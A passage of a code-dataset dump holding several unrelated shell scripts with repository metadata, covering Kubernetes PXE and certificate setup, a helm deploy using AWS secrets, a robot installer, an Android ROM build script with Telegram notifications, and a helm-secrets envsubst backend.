    # ($relayd_flags is intentionally unquoted so multiple flags word-split.)
    . /etc/rc.conf.local
    relayd $relayd_flags
else
    relayctl reload
fi
| true |
7175f57dc9ca2ee58b3e460d6eaa3e60a8e7aede | Shell | patrickmcclory/k8s-local | /setup-local.sh | UTF-8 | 4,439 | 3.453125 | 3 | [] | no_license | #!/bin/bash
# Prepare a local PXE-boot environment for a CoreOS/Kubernetes cluster:
# download CoreOS PXE images and pxelinux boot files, fetch kubectl
# binaries, generate the cluster TLS material, and prime the remote host.
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
source ${DIR}/variables.sh
echo ''
echo 'Getting CoreOS files for alpha, beta and stable releases... just in case'
echo ''
for releasename in alpha beta stable; do
echo " Downloading ${releasename} files"
sudo mkdir -p ${DIR}/tftpboot/coreos/${releasename}
sudo curl https://${releasename}.release.core-os.net/amd64-usr/current/coreos_production_pxe.vmlinuz -o ${DIR}/tftpboot/coreos/${releasename}/coreos_production_pxe.vmlinuz
sudo curl https://${releasename}.release.core-os.net/amd64-usr/current/coreos_production_pxe_image.cpio.gz -o ${DIR}/tftpboot/coreos/${releasename}/coreos_production_pxe_image.cpio.gz
done
sudo chmod -R 755 /var/lib/tftpboot/*
echo ""
echo "Done getting CoreOS files!"
echo ''
echo 'Getting core pxeboot files for pxeboot process'
echo ''
filelist=("gpxelinux.0" "ldlinux.c32" "lpxelinux.0" "memdisk" "menu.c32" "pxelinux.0")
for filename in "${filelist[@]}"; do
# BUG FIX: the loop body contained literal "$(unknown)" command
# substitutions instead of the loop variable; use ${filename}.
sudo rm -rf tftpboot/${filename}
sudo curl http://www.mcclory.io/resources/pxeboot/${filename} -o ${DIR}/tftpboot/${filename}
done
echo ""
echo "Downloading k8s binaries for kubectl"
version_ids=('v1.4.6' 'v1.4.5' 'v1.4.3')
for version_id in "${version_ids[@]}"; do
# Download k8s files
echo " Getting kubectl for version ${version_id}"
sudo mkdir -p ${DIR}/http/k8s/${version_id}
sudo wget https://storage.googleapis.com/kubernetes-release/release/${version_id}/bin/linux/amd64/kubectl -O ${DIR}/http/k8s/${version_id}/kubectl
done
echo ""
echo "Done Downloading k8s kubectl binaries"
echo ""
# Create us some keys!
# Basically following steps here: https://coreos.com/kubernetes/docs/latest/openssl.html
cd ${DIR}/http/keys
echo ""
echo "Creating Clicster Root CA"
echo ""
sudo openssl genrsa -out ca-key.pem 2048
sudo openssl req -x509 -new -nodes -key ca-key.pem -days 10000 -out ca.pem -subj "/CN=kube-ca"
echo ""
echo "Creating API Server Keypair"
echo ""
cat >> api-openssl.cnf << EOF
[req]
req_extensions = v3_req
distinguished_name = req_distinguished_name
[req_distinguished_name]
[ v3_req ]
basicConstraints = CA:FALSE
keyUsage = nonRepudiation, digitalSignature, keyEncipherment
subjectAltName = @alt_names
[alt_names]
DNS.1 = kubernetes
DNS.2 = kubernetes.default
DNS.3 = kubernetes.default.svc
DNS.4 = kubernetes.default.svc.cluster.local
DNS.5 = ${CLUSTER_DOMAIN_NAME}
IP.1 = ${K8S_SERVICE_IP}
IP.2 = ${MASTER_HOST}
EOF
sudo openssl genrsa -out apiserver-key.pem 2048
sudo openssl req -new -key apiserver-key.pem -out apiserver.csr -subj "/CN=kube-apiserver" -config api-openssl.cnf
sudo openssl x509 -req -in apiserver.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out apiserver.pem -days 10000 -extensions v3_req -extfile api-openssl.cnf
echo ""
echo "Creating Worker Keypairs"
echo ""
# The worker SAN is injected per-host via the WORKER_IP environment
# variable (note the escaped \$ENV so openssl, not the shell, expands it).
cat >> worker-openssl.cnf << EOF
[req]
req_extensions = v3_req
distinguished_name = req_distinguished_name
[req_distinguished_name]
[ v3_req ]
basicConstraints = CA:FALSE
keyUsage = nonRepudiation, digitalSignature, keyEncipherment
subjectAltName = @alt_names
[alt_names]
IP.1 = \$ENV::WORKER_IP
EOF
for (( i=1; i<=${NUMBER_OF_HOSTS}; i++ ))
do
FMT_DIGIT=$(printf "%02d" $i)
WORKER_FQDN=dev-${FMT_DIGIT}.${CLUSTER_DOMAIN_NAME}
WORKER_IP=172.16.16.${i}0
echo "FQDN: "${WORKER_FQDN}
echo "IP: "${WORKER_IP}
echo ""
sudo openssl genrsa -out ${WORKER_FQDN}-worker-key.pem 2048
sudo WORKER_IP=${WORKER_IP} openssl req -new -key ${WORKER_FQDN}-worker-key.pem -out ${WORKER_FQDN}-worker.csr -subj "/CN=${WORKER_FQDN}" -config worker-openssl.cnf
sudo WORKER_IP=${WORKER_IP} openssl x509 -req -in ${WORKER_FQDN}-worker.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out ${WORKER_FQDN}-worker.pem -days 10000 -extensions v3_req -extfile worker-openssl.cnf
echo ""
echo "done!"
echo ""
echo ""
done
echo "--------------------------------------------------------------------------------"
echo ""
echo "Generating Admin Key"
sudo openssl genrsa -out admin-key.pem 2048
sudo openssl req -new -key admin-key.pem -out admin.csr -subj "/CN=kube-admin"
sudo openssl x509 -req -in admin.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out admin.pem -days 10000
echo "Done generating Admin Key"
echo ""
sudo chmod 600 ${DIR}/http/keys/*
echo "Set up folder(s) on remote machine"
ssh ${REMOTE_MACHINE_USER}@${PXEBOOT_IP} "sudo mkdir -p /opt/k8s-local && sudo chown -R ${REMOTE_MACHINE_USER}:${REMOTE_MACHINE_USER} /opt/k8s-local"
4fd5effef024ccbadd98264c84024529d9aab15a | Shell | HumanCellAtlas/ingest-kube-deployment | /infra/helm-charts/mongo/setup.sh | UTF-8 | 903 | 2.6875 | 3 | [] | no_license | #! /usr/bin/env sh
# Deploy/upgrade the "mongo" helm release for the given deployment stage.
# S3 backup credentials and the Slack alert webhook are pulled from AWS
# Secrets Manager and injected as chart values.
deployment_stage=$1
s3_access_secrets=$(aws secretsmanager get-secret-value --secret-id dcp/ingest/${deployment_stage}/mongo-backup/s3-access --region=us-east-1 | jq -r .SecretString)
# Keys are base64-encoded here -- presumably the chart writes them into a
# Kubernetes Secret verbatim; NOTE(review): confirm against the chart.
access_key_id=$(echo ${s3_access_secrets} | jq -jr .access_key_id | base64)
access_key_secret=$(echo ${s3_access_secrets} | jq -jr .access_key_secret| base64)
slack_alert_webhook=$(aws secretsmanager get-secret-value --secret-id dcp/ingest/${deployment_stage}/alerts --region=us-east-1 | jq -r .SecretString | jq -r .webhook_url)
helm package .
# Load stage-specific environment variables used during deployment.
. ../../../config/environment_${deployment_stage}
helm upgrade mongo ./ --wait --install --force -f values.yaml -f environments/${deployment_stage}.yaml --set ingestbackup.secret.aws.accessKey=${access_key_id},ingestbackup.secret.aws.secretAccessKey=${access_key_secret},ingestbackup.verification.slack.webhookUrl=${slack_alert_webhook}
# Remove the packaged chart archive produced by `helm package`.
rm *.tgz
| true |
4bdcd6a36b5d3326544de31c5a4cfff30ca5451a | Shell | zzkoro/hombyme | /start-service.sh | UTF-8 | 640 | 3.296875 | 3 | [] | no_license | #!/usr/bin/env bash
# Start one of the four microservices in the background, selected by the
# first CLI argument (cmp|prd|rec|rev).
start_cmp() {
    java -jar microservices/product-composite-service/build/libs/*.jar &
}
start_prd() {
    java -jar microservices/product-service/build/libs/*.jar &
}
start_rec() {
    java -jar microservices/recommendation-service/build/libs/*.jar &
}
start_rev() {
    java -jar microservices/review-service/build/libs/*.jar &
}
# NOTE(review): RET_STATUS only captures whether backgrounding succeeded
# and is never read afterwards; the script always exits 0 on known args.
case "$1" in
  cmp)
    start_cmp
    RET_STATUS=$?
    ;;
  prd)
    start_prd
    RET_STATUS=$?
    ;;
  rec)
    start_rec
    RET_STATUS=$?
    ;;
  rev)
    start_rev
    RET_STATUS=$?
    ;;
  *)
    echo "Usage: start-service.sh {cmp|prd|rec|rev}" >&2
    exit 1
    ;;
  esac
exit 0
| true |
9c491d2a74b2f3948a571cd9c63b4c5f9e265310 | Shell | robocupmipt/BHumanCodeRelease | /Install/installRobot | UTF-8 | 4,921 | 4.125 | 4 | [
"BSD-2-Clause"
] | permissive | #!/bin/bash
set -eu
# Resolve the script location so sibling resources (Include/, Robots/,
# Install/) are found regardless of the caller's working directory.
baseDir="$(cd "$(dirname "$(which "$0")")" && pwd)"
bhDir="$(dirname "${baseDir}")"
includeDir="${baseDir}/Include/"
# bhumanBase supplies helpers and settings used below: message/error/fatal,
# copyKey, checkApp, ${robotsFile}, ${privateKey}, ${sshOptions},
# ${sshCommand}, ${rsyncOptions}, ${pingoptions}, ${fileDir}.
source "${includeDir}/bhumanBase"
headName=""
robotVersion=""
# Print command-line usage and terminate with status 1.
usage() {
  echo "usage:"
  echo "${0} <ipaddress>"
  echo ""
  echo " <address>   : the current dns name or ip address of the robot to install"
  echo " -h|--help   : displays this help"
  exit 1
}
# Validate the single <ipaddress> argument and check the robot answers a
# ping.  Sets the global ${robotIp} used by all later steps.
parseOptions() {
  # -h or --help => print help
  if [ $# -ne 1 ] ; then
    if [ $# -gt 1 ] ; then
      error "Too many arguments!"
    fi
    usage
  fi
  robotIp=${1}
  # try to ping robot: the backticks yield "1" on ping success, "0" on
  # failure, turning ping's exit status into a testable string.
  if [ `ping ${pingoptions} ${robotIp} > /dev/null && echo 1 || echo 0` == "0" ]; then
    error "robot not reachable at ${robotIp}"
    usage
  fi
}
# Read the robot's head id over ssh, look up the matching robot name in
# ${robotsFile}, and verify a per-robot directory exists under Robots/.
# Sets the globals ${robotName} and ${robotDir}.
getNames() {
  # Test if robots.cfg exists
  if [ ! -f "${robotsFile}" ]; then
    fatal "The file ${robotsFile} (containing the robot names and ids) does not exist!"
  fi
  # get headId
  local headId
  headId=$(ssh -i "${privateKey}" ${sshOptions} nao@${robotIp} "cat /sys/qi/head_id 2>/dev/null || true")
  # BUG FIX: quote ${headId} -- the unquoted expansion misbehaves when the
  # id is empty or contains whitespace.
  if [ -z "${headId}" ]; then
    fatal "Failed reading the headId!"
  fi
  #find robotName
  grepForHeadId=$(grep ${headId} "${robotsFile}")
  numOfMatchingHeadIds=$(echo "${grepForHeadId}" | wc -l)
  if [ ${numOfMatchingHeadIds} -eq 0 ]; then
    fatal "The headId \"${headId}\" is missing (in ${robotsFile})!"
  elif [ ${numOfMatchingHeadIds} -gt 1 ]; then
    fatal "${robotsFile} contains the headId \"${headId}\" more than once!"
  else
    robotName=$(echo "${grepForHeadId}" | sed "s%.*name[ ]*=[ ]*\"\([^\"]*\).*%\1%")
    # BUG FIX: unquoted ${robotName} turned this into `[ == "" ]` (a test
    # syntax error) exactly when the name was empty -- the case being
    # tested for.  Quote it.
    if [ "${robotName}" == "" ]; then
      fatal "RobotName is empty"
    fi
  fi
  robotDir="${baseDir}/Robots/${robotName}"
  # does the robot exist?
  if [ ! -d "${robotDir}" ]; then
    fatal "Robot \"${robotName}\" does not exist"
  fi
  echo ""
  echo "using parameters"
  echo " robotName: ${robotName}"
  echo " address: ${robotIp}"
  echo ""
}
# Copy the install payload, the per-robot configuration, and a minimal
# runtime-library sysroot to /tmp/NaoInstall/<robot> on the NAO.
copyFiles() {
  copyTo="/tmp/NaoInstall/${robotName}"
  message "Copying files to ${copyTo}"
  # BUG FIX: the pattern must be UNQUOTED for [[ == ]] glob matching; the
  # quoted "*CYGWIN*" only matched that literal string and never fired.
  if [[ $(uname) == *CYGWIN* ]] ; then
    chmod -R 755 "${fileDir}"
    setfacl -s d:u::rwx,d:g::r-x,d:o:r-x "${fileDir}" #due to windows 8
    chmod -R 755 "${robotDir}"
    setfacl -s d:u::rwx,d:g::r-x,d:o:r-x "${robotDir}" #due to windows 8
    chmod -R 755 "${baseDir}/Network/Profiles"
    setfacl -s d:u::rwx,d:g::r-x,d:o:r-x "${baseDir}/Network/Profiles" #due to windows 8
  fi
  ssh -i "${privateKey}" ${sshOptions} nao@${robotIp} "rm -Rf ${copyTo}" || fatal "Can't remove '${copyTo}' on NAO"
  ssh -i "${privateKey}" ${sshOptions} nao@${robotIp} "mkdir -p ${copyTo}" || fatal "Can't create '${copyTo}' on NAO"
  rsync ${rsyncOptions} -e "${sshCommand}" "${fileDir}"/* nao@${robotIp}:${copyTo} || fatal "Can't copy to '${copyTo}' on NAO"
  rsync ${rsyncOptions} -e "${sshCommand}" "${robotDir}"/* nao@${robotIp}:${copyTo}/Robot/ || fatal "Can't copy to '${copyTo}/Robot' on NAO"
  rsync ${rsyncOptions} -e "${sshCommand}" "${baseDir}/Network/Profiles" nao@${robotIp}:${copyTo}/Robot/ || fatal "Can't copy to '${copyTo}/Robot' on NAO"
  # Assemble a throw-away sysroot with the runtime libraries, copied under
  # their soname file names.
  sysrootDir="/tmp/bhSysroot1337"
  rm -Rf "${sysrootDir}"
  mkdir -p "${sysrootDir}/lib"
  cp "${bhDir}/Util/Buildchain/V6/gcc/lib/ld-2.29.so" "${sysrootDir}/lib/ld-linux.so.2"
  cp "${bhDir}/Util/Buildchain/V6/gcc/lib/libc-2.29.so" "${sysrootDir}/lib/libc.so.6"
  cp "${bhDir}/Util/Buildchain/V6/gcc/lib/libdl-2.29.so" "${sysrootDir}/lib/libdl.so.2"
  cp "${bhDir}/Util/Buildchain/V6/gcc/lib/libm-2.29.so" "${sysrootDir}/lib/libm.so.6"
  cp "${bhDir}/Util/Buildchain/V6/gcc/lib/libmvec-2.29.so" "${sysrootDir}/lib/libmvec.so.1"
  cp "${bhDir}/Util/Buildchain/V6/gcc/lib/libpthread-2.29.so" "${sysrootDir}/lib/libpthread.so.0"
  cp "${bhDir}/Util/Buildchain/V6/gcc/lib/librt-2.29.so" "${sysrootDir}/lib/librt.so.1"
  cp "${bhDir}/Util/Buildchain/V6/gcc/lib/libstdc++.so.6.0.24" "${sysrootDir}/lib/libstdc++.so.6"
  cp "${bhDir}/Util/Buildchain/V6/gcc/lib/libgcc_s.so.1" "${sysrootDir}/lib/libgcc_s.so.1"
  cp "${bhDir}/Util/Buildchain/V6/gcc/lib/libasound.so" "${sysrootDir}/lib/libasound.so.2"
  rsync ${rsyncOptions} -e "${sshCommand}" "${sysrootDir}"/* nao@${robotIp}:${copyTo}/sysroot/ || fatal "Can't copy to '${copyTo}' on NAO"
}
# Run the copied install script on the robot, in a login shell so the
# robot-side environment is set up.
runInstallation() {
  message "launching install process"
  ssh -i "${privateKey}" ${sshOptions} nao@${robotIp} "chmod 755 ${copyTo}/install && bash -l -c '${copyTo}/install'" || fatal "Installation failed"
}
###############################################################################
##                                                                           ##
##  MAIN                                                                     ##
##                                                                           ##
###############################################################################
checkApp "rsync"
parseOptions "$@"
# Install our public key on the robot so later ssh/rsync runs unattended.
copyKey ${robotIp}
getNames
copyFiles
runInstallation
| true |
47a450f4024e8bd665df59c61e027024ddab8421 | Shell | vjspranav/RomBuildScript | /script_build.sh | UTF-8 | 4,649 | 3.71875 | 4 | [] | no_license | #!/bin/bash
# curl https://raw.githubusercontent.com/vjspranav/RomBuildScript/ryzen7/script_build.sh>script_build.sh
# Make necessary changes before executing script
# Export some variables
# make_clean (yes/no/installclean/deviceclean)
# --- Build configuration -----------------------------------------------------
# user:        shell account that owns ~/downloads and the ccache directory
# lunch:       ROM lunch prefix (combined with the device codename below)
# tg_username: Telegram handle shown in build notifications
user=
lunch=
device_codename=avicii
build_type=userdebug
tg_username=
# Android build output directory for this device.
OUT_PATH="out/target/product/$device_codename"
use_ccache=yes
make_clean=no
# stopped=1 once the EXIT/SIGINT trap has fired; finish=1 once the build
# completed normally, which keeps the trap's "stopped" message silent.
stopped=0
finish=0
# EXIT/SIGINT trap: release the global build lock and, unless the build
# already completed (finish=1), announce on Telegram that it was stopped.
function finish {
stopped=1
rm -rf /tmp/manlocktest.lock;
read -r -d '' msg <<EOT
<b>Build Stopped</b>
<b>Device:-</b> ${device_codename}
<b>Started by:-</b> ${tg_username}
EOT
if [ $finish = 0 ] ; then
telegram-send --format html "$msg" --config /ryzen.conf
fi
}
# Derive the global duration fields hours/minutes/seconds -- plus their
# singular/plural unit labels h/m/s -- from the global second counter $i.
function setVar {
  hours=$(( i / 3600 ))
  minutes=$(( (i % 3600) / 60 ))
  seconds=$(( i % 60 ))
  if [ "$hours" -eq 1 ]; then h="Hour"; else h="Hours"; fi
  if [ "$minutes" -eq 1 ]; then m="Minute"; else m="Minutes"; fi
  if [ "$seconds" -eq 1 ]; then s="Second"; else s="Seconds"; fi
}
# ---- Global build lock ------------------------------------------------------
# "set -C" (noclobber) makes creating /tmp/manlocktest.lock atomic: the first
# builder acquires it; everyone else waits here with a live timer showing who
# holds the lock.
i=0
echo -n "Test Line might be deleted"
while { set -C; ! 2>/dev/null > /tmp/manlocktest.lock; }; do
((i=i+1))
uname2=$(ls -l /tmp/manlocktest.lock | awk '{print $3}');
setVar
if [ $uname2 = $USER ]; then
echo -e "Warning you can't wait while you are building"
exit 1
elif [ $i -gt 3600 ]; then
hours=$((i/3600))
minutes=$(( $((i/60)) - $((hours*60))))
seconds=$(( i - $((hours*60*60)) - $((minutes*60))))
pr="$hours $h $minutes $m $seconds $s "
elif [ $i -lt 60 ]; then
pr="$i $s "
else
minutes=$((i/60))
seconds=$(( i - $((minutes*60))))
pr="$minutes $m $seconds $s "
fi
echo -n -e "\r${uname2} Building. Waiting for $pr"
sleep 10
done
# From here on we hold the lock: always clean up + notify via finish().
trap finish EXIT SIGINT
echo -e "\rBuild starting thank you for waiting"
#Start Counting build time after build started we don't want wait time included
START=$(date +%s)
BUILDFILE="buildlog"_$START.txt
mkdir -p /home/${user}/downloads/buildlogs/
touch /home/${user}/downloads/buildlogs/${BUILDFILE}
BLINK="http://${user}.ryzenbox.me/buildlogs/${BUILDFILE}"
# Send message to TG
read -r -d '' msg <<EOT
<b>Build Started</b>
<b>Device:-</b> ${device_codename}
<b>Started by:-</b> ${tg_username}
<b>Console log:-</b> <a href="${BLINK}">here</a>
EOT
telegram-send --format html "$msg" --config /ryzen.conf
# Colors makes things beautiful
export TERM=xterm
red=$(tput setaf 1) # red
grn=$(tput setaf 2) # green
blu=$(tput setaf 4) # blue
cya=$(tput setaf 6) # cyan
txtrst=$(tput sgr0) # Reset
# Ccache
if [ "$use_ccache" = "yes" ];
then
echo -e ${blu}"CCACHE is enabled for this build"${txtrst}
export CCACHE_EXEC=$(which ccache)
export USE_CCACHE=1
export CCACHE_DIR=/home/$user/ccache
ccache -M 75G
fi
if [ "$use_ccache" = "clean" ];
then
export CCACHE_EXEC=$(which ccache)
export CCACHE_DIR=/home/$user/ccache
ccache -C
export USE_CCACHE=1
ccache -M 75G
wait
echo -e ${grn}"CCACHE Cleared"${txtrst};
fi
rm -rf ${OUT_PATH}/*.zip #clean rom zip in any case
# Time to build
source build/envsetup.sh
lunch "$lunch"_"$device_codename"-"$build_type"
# Clean build
if [ "$make_clean" = "yes" ];
then
make clean && make clobber
wait
echo -e ${cya}"OUT dir from your repo deleted"${txtrst};
fi
if [ "$make_clean" = "installclean" ];
then
make installclean
rm -rf ${OUT_PATH}/${ROM_ZIP}
wait
echo -e ${cya}"Images deleted from OUT dir"${txtrst};
fi
if [ "$make_clean" = "deviceclean" ];
then
make deviceclean
rm -rf ${OUT_PATH}/${ROM_ZIP}
wait
echo -e ${cya}"Device dir deleted from OUT dir"${txtrst};
fi
make bacon -j16 |& tee "/home/${user}/downloads/buildlogs/${BUILDFILE}"
END=$(date +%s)
TIME=$(echo $((${END}-${START})) | awk '{print int($1/60)" Minutes and "int($1%60)" Seconds"}')
ROM=${OUT_PATH}/StagOS*.zip
if [ -f $ROM ]; then
cp $ROM /home/${user}/downloads/
filename="$(basename $ROM)"
# BUG FIX: the download link contained a literal "$(unknown)" command
# substitution; it must point at the copied ROM zip (${filename}).
LINK="http://${user}.ryzenbox.me/${filename}"
read -r -d '' suc <<EOT
<b>Build Finished</b>
<b>Time:-</b> ${TIME}
<b>Device:-</b> ${device_codename}
<b>Started by:-</b> ${tg_username}
<b>Download:-</b> <a href="${LINK}">here</a>
EOT
else
# Send message to TG
cp out/error.log /home/${user}/downloads/error.txt
read -r -d '' suc <<EOT
<b>Build Errored</b>
<b>Time:-</b> ${TIME}
<b>Device:-</b> ${device_codename}
<b>Started by:-</b> ${tg_username}
<b>Check error:-</b> <a href="http://${user}.ryzenbox.me/error.txt">here</a>
EOT
fi
if [ $stopped = 0 ] ; then
telegram-send --format html "$suc" --config /ryzen.conf
fi
# Mark success so the EXIT trap does not send a "Build Stopped" message.
finish=1
| true |
8f43b5f82f82a0ba3681975e9d55df343111f715 | Shell | drmingdrmer/homefolder | /xp/bash-d/sbin/util.sh | UTF-8 | 4,225 | 3.59375 | 4 | [] | no_license | #!/bin/sh
# Default log sink; callers may pre-set LOG_FILE to capture err/ok/info lines.
LOG_FILE=${LOG_FILE-/dev/null}
# color definitions {{{
# Escape sequences are resolved with a fixed "linux" terminal type so they
# do not depend on the caller's $TERM.
Black="$(tput -T linux setaf 0)"
BlackBG="$(tput -T linux setab 0)"
DarkGrey="$(tput -T linux bold ; tput -T linux setaf 0)"
LightGrey="$(tput -T linux setaf 7)"
LightGreyBG="$(tput -T linux setab 7)"
White="$(tput -T linux bold ; tput -T linux setaf 7)"
Red="$(tput -T linux setaf 1)"
RedBG="$(tput -T linux setab 1)"
LightRed="$(tput -T linux bold ; tput -T linux setaf 1)"
Green="$(tput -T linux setaf 2)"
GreenBG="$(tput -T linux setab 2)"
LightGreen="$(tput -T linux bold ; tput -T linux setaf 2)"
Brown="$(tput -T linux setaf 3)"
BrownBG="$(tput -T linux setab 3)"
Yellow="$(tput -T linux bold ; tput -T linux setaf 3)"
Blue="$(tput -T linux setaf 4)"
BlueBG="$(tput -T linux setab 4)"
LightBlue="$(tput -T linux bold ; tput -T linux setaf 4)"
Purple="$(tput -T linux setaf 5)"
PurpleBG="$(tput -T linux setab 5)"
Pink="$(tput -T linux bold ; tput -T linux setaf 5)"
Cyan="$(tput -T linux setaf 6)"
CyanBG="$(tput -T linux setab 6)"
LightCyan="$(tput -T linux bold ; tput -T linux setaf 6)"
NC="$(tput -T linux sgr0)" # No Color
# }}}
# Logging helpers: each prints a colored status line on stdout and appends a
# timestamped copy to ${LOG_FILE}.  Multiple arguments are joined with
# spaces, exactly like the previous "$@"-inside-a-string behaviour.

err()
{ #{{{
    printf '%s[ ERROR ]%s %s\n' "$LightRed" "$NC" "$*"
    printf '[%s][ ERROR ] %s\n' "$(/bin/date +"%F %T")" "$*" >> "${LOG_FILE}"
} #}}}

ok()
{ #{{{
    printf '%s[ OK ]%s %s\n' "${LightGreen}" "$NC" "$*"
    printf '[%s][ OK ] %s\n' "$(/bin/date +"%F %T")" "$*" >> "${LOG_FILE}"
} #}}}

info()
{ #{{{
    printf '%s[ INFO ]%s %s\n' "$Yellow" "$NC" "$*"
    printf '[%s][ INFO ] %s\n' "$(/bin/date +"%F %T")" "$*" >> "${LOG_FILE}"
} #}}}
# Succeed iff the named command is resolvable.
# IMPROVEMENT: `which` is an external, non-portable tool; the POSIX way to
# test command availability is the `command -v` builtin.
has_command()
{ #{{{
    command -v "$1" >/dev/null 2>&1
} #}}}
# Convert a "yyyy-mm-dd[ HH[:MM]]" timestamp into seconds since the epoch.
# Relies on GNU date's -d option.
date_epoch()
{ #{{{
    date -d "$1" '+%s'
} #}}}
# Print a pseudo-random string of $1 digits (default 4), taken from the
# leading digits of the current nanosecond counter.
# BUG FIX: cut character positions are 1-based; "cut -c 0-N" is an error on
# GNU coreutils, so the function previously printed nothing.
rand()
{ #{{{
    local ndig=${1-4}
    date +%N | cut -c 1-"$ndig"
} #}}}
# Print local IPv4 addresses parsed from ifconfig, excluding loopback.
# With "ex" (the default) print only addresses OUTSIDE the 172.* / 10.*
# ranges; any other argument prints only those addresses.
# NOTE(review): relies on the legacy "inet addr:" ifconfig output format
# and does not treat 192.168.* as internal -- confirm before reuse.
local_ip()
{ #{{{
    local tp=${1-ex}
    if [ "$tp" == "ex" ]; then
        /sbin/ifconfig | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}' | grep -v "^172\.\|^10\."
    else
        /sbin/ifconfig | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}' | grep "^172\.\|^10\."
    fi
} #}}}
__cmds_on_exit__=""

# Register a command to run on exit / INT / QUIT / TERM.  Because `trap`
# replaces any previously installed handler, commands are accumulated in
# __cmds_on_exit__ (joined with "; ") and the trap is re-armed with the
# whole chain on every call.
on_exit()
{ #{{{
    __cmds_on_exit__="${__cmds_on_exit__:+${__cmds_on_exit__}; }$*"
    trap "$__cmds_on_exit__" 0 2 3 15
} #}}}
# Ensure only one instance named $1 runs at a time.  mkdir is atomic, so
# the first caller creates the lock directory and registers its removal on
# exit; any later caller logs a notice to stderr and exits.
single_proc()
{ #{{{
    local lockName=$1
    local lockFile=/tmp/$lockName
    if mkdir $lockFile; then
        on_exit "rm -rf $lockFile"
        return 0
    else
        # NOTE(review): message typo "ruuning" kept as-is (runtime string).
        echo `date +"%F %T"` " Another Process is ruuning, exit" >&2
        exit
    fi
} #}}}
# Write each argument after the file name $1 as its own line of $1,
# overwriting any previous content.  Used to persist "name=value" pairs
# that load_tmp later sources back in.
# BUG FIX: the old `while shift; do echo "$1"; done` loop appended one
# spurious empty line after the last value; printf writes exactly one line
# per argument (and is safe for values starting with "-").
save_tmp()
{ #{{{
    local fn=$1
    shift
    printf '%s\n' "$@" > "$fn"
} #}}}
# Source $1 into the current shell when it is a regular file.
# Returns 0 when loaded, 1 when the file does not exist.
load_tmp()
{ #{{{
    local fn=$1
    [ -f "$fn" ] || return 1
    . "$fn"
    return 0
} #}}}
# Log (via ok) and continue when regular file $1 exists; otherwise log an
# error and terminate the whole script with status 1.
exit_if_inexist()
{ #{{{
    if [ -f $1 ]; then
        ok "Exist: $1"
    else
        err "Exit because no such file: $1"
        exit 1
    fi
} #}}}
# Restore incremental-scan state for log file $2 from state file $1.
# Sets the globals:
#   _inode  - inode of the log when the state was last saved
#   _offset - byte offset where the previous scan stopped
# plus _sizeReadTmpFN, a scratch file the caller fills with the number of
# bytes consumed this round (consumed by save_scanning_st).
# Saved state is discarded when the log was rotated (inode changed) or
# truncated (saved offset beyond the current size).  Also registers an
# automatic save on shell exit via on_exit.
load_scanning_st()
{ #{{{
    local statsFn=$1
    local logfn=$2
    local statsFolder=${statsFn%/*}

    exit_if_inexist $logfn
    mkdir -p "$statsFolder"

    currentInode=`stat -c %i $logfn`
    currentSize=`stat -c %s $logfn`

    _sizeReadTmpFN=/tmp/`rand 4`

    # Defaults apply when the state file is missing (load_tmp returns 1).
    _inode=0
    _offset=0
    load_tmp $statsFn

    if [ "$_inode" != "$currentInode" ]; then
        _inode=$currentInode
        _offset=0
    fi

    if [ "$_offset" -gt "$currentSize" ];then
        _offset=0
    fi

    # auto save and cleanup
    on_exit "save_scanning_st $statsFn"
} #}}}
# Persist scan state to state file $1: advance _offset by the byte count
# the caller wrote into $_sizeReadTmpFN, store _inode/_offset via save_tmp,
# then drop the scratch file.  (statsFolder is computed for symmetry with
# load_scanning_st but unused here.)
save_scanning_st()
{ #{{{
    local statsFn=$1
    local statsFolder=${statsFn%/*}

    dumpSize=`cat $_sizeReadTmpFN`
    let _offset=_offset+dumpSize

    save_tmp $statsFn "_inode=$_inode" "_offset=$_offset"
    rm -rf $_sizeReadTmpFN
} #}}}
svn_rev()
{ #{{{
    # Print the last-changed revision of SVN working copy $1 by scraping
    # 'svn info' output (second-to-last non-blank line, last field).
    # NOTE(review): positional parsing is locale/format fragile;
    # 'svn info --show-item last-changed-revision' is sturdier where
    # available.
    local dir=$1
    svn info $dir | grep -v "^$" | tail -n2 |head -n1 | awk '{print $NF}'
} #}}}
| true |
3e0987135bc9492afc97d5f0d119986bad0dde68 | Shell | jkroepke/helm-secrets | /examples/backends/envsubst.sh | UTF-8 | 869 | 3.875 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env sh
if [ "${QUIET}" = "false" ]; then
log 'DEPRECATED: Envsubst backend is going to be remove in the next major version. Use vals backend instead.'
fi
_envsubst() {
    # Run envsubst with any extra options from $SECRET_BACKEND_ARGS
    # prepended to the caller's arguments.  The expansion is deliberately
    # left unquoted so the variable can carry several whitespace-separated
    # flags.
    # shellcheck disable=SC2086
    set -- ${SECRET_BACKEND_ARGS} "$@"

    envsubst "$@"
}
_custom_backend_is_file_encrypted() {
    # A file counts as "encrypted" for this backend when it contains at
    # least one literal '$', i.e. something envsubst could expand.
    candidate="${1}"

    grep -q '\$' "${candidate}"
}
_custom_backend_encrypt_file() {
    # envsubst is expand-only; there is no inverse transform to offer.
    printf '%s\n' 'Encrypting files with envsubst backend is not supported!'
    exit 1
}
_custom_backend_decrypt_file() {
    # "Decrypting" with this backend just means expanding $VAR references.
    #   $1: secret type (unused; kept for the backend interface)
    #   $2: input file
    #   $3: optional output file; result goes to stdout when empty/omitted
    # shellcheck disable=SC2034
    type="${1}"
    input="${2}"
    output="${3:-}"

    if [ -n "${output}" ]; then
        _envsubst <"${input}" >"${output}"
    else
        _envsubst <"${input}"
    fi
}
_custom_backend_edit_file() {
    # Without a reverse transform there is nothing to re-encrypt after an
    # edit, so in-place editing cannot be offered.
    printf '%s\n' 'Editing files with envsubst backend is not supported!'
    exit 1
}
| true |
94230fc04d10a563cc03ab548398115e58b78cc5 | Shell | ODEX-TOS/packages | /tidy/trunk/PKGBUILD | UTF-8 | 1,164 | 2.875 | 3 | [
"GPL-1.0-or-later",
"MIT"
] | permissive | # Maintainer:
# Contributor: eric <eric@archlinux.org>
# Contributor: Markus Meissner <markus@meissna.de>
pkgname=tidy
pkgver=5.7.16
_commit=5f7e367cb54563dabda4bf4e3c11c6ecc68a0fa3
pkgrel=2
pkgdesc="A tool to tidy down your HTML code to a clean style"
arch=(x86_64)
